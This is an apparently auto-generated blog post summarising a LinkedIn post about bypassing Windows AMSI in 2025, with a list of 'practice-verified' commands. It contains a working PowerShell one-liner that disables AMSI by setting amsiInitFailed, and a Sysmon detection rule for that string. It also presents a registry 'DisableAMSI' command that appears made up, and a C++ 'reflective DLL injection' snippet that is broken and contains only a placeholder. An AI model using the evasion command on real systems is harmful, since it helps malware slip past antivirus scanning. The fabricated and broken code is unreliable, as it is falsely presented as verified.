The State of AMSI Bypasses in 2025: A Cybersecurity Perspective

Listen to this Post

Fantastic read by Fabian Mosch (@ShitSecure) about the state of AMSI bypasses in 2025.
https://lnkd.in/gP7FapiV

The conclusion of the blog post: “Much of the content that was relevant years ago to bypass AMSI is still relevant several years later.”

Practice-Verified Codes and Commands:

1. AMSI Bypass via Memory Patching (PowerShell):

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

2. **AMSI Bypass via Registry Key Modification:**

New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "DisableAMSI" -Value 1 -PropertyType DWord -Force

3. **Detecting AMSI Bypass Attempts with Sysmon:**

<Sysmon>
<EventFiltering>
<RuleGroup name="AMSI Bypass Detection">
<ProcessCreate onmatch="include">
<CommandLine condition="contains">amsiInitFailed</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>

4. **AMSI Bypass via Reflective DLL Injection (C++):**

#include <windows.h>
#include <amsi.h>
#pragma comment(lib, "amsi.lib")

void BypassAMSI() {
AMSI_RESULT result;
HRESULT hr = AmsiScanBuffer(NULL, 0, "EICAR", NULL, &result);
if (hr == S_OK && result == AMSI_RESULT_DETECTED) {
// Bypass logic here
}
}
  1. Detecting AMSI Bypass Techniques with Trend Micro Vision One:

For more details, visit:

https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html

**What Undercode Say**

The state of AMSI bypasses in 2025 highlights the persistent challenges in cybersecurity, particularly in the realm of evasion techniques. As attackers continue to refine their methods, defenders must stay ahead by understanding offensive tactics. The relevance of older bypass techniques underscores the importance of continuous learning and adaptation in cybersecurity.

For blue teamers, diving into offensive content is not just beneficial but essential. Tools like PowerShell, Sysmon, and reflective DLL injection are critical in both executing and detecting AMSI bypasses. Commands such as memory patching in PowerShell ([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')) and registry modifications (New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI") are foundational in understanding these techniques.

Moreover, leveraging advanced detection tools like Trend Micro Vision One can significantly enhance threat hunting capabilities. The integration of Sysmon configurations for AMSI bypass detection (<CommandLine condition="contains">amsiInitFailed</CommandLine>) provides a proactive approach to identifying malicious activities.

In conclusion, the cybersecurity landscape demands a blend of offensive and defensive knowledge. By mastering evasion techniques and employing robust detection mechanisms, analysts can better safeguard systems against evolving threats. The journey to becoming a proficient cybersecurity professional is ongoing, and resources like Fabian Mosch’s insights and Trend Micro’s research are invaluable in this pursuit.

For further reading, explore:

  • https://lnkd.in/gP7FapiV
  • https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html

References:

initially reported by: https://www.linkedin.com/posts/stephan-berger-59575a20a_fantastic-read-by-fabian-mosch-shitsecure-activity-7301591352419524609-jUO2 – Hackers Feeds
Extra Hub:
Undercode AIFeatured Image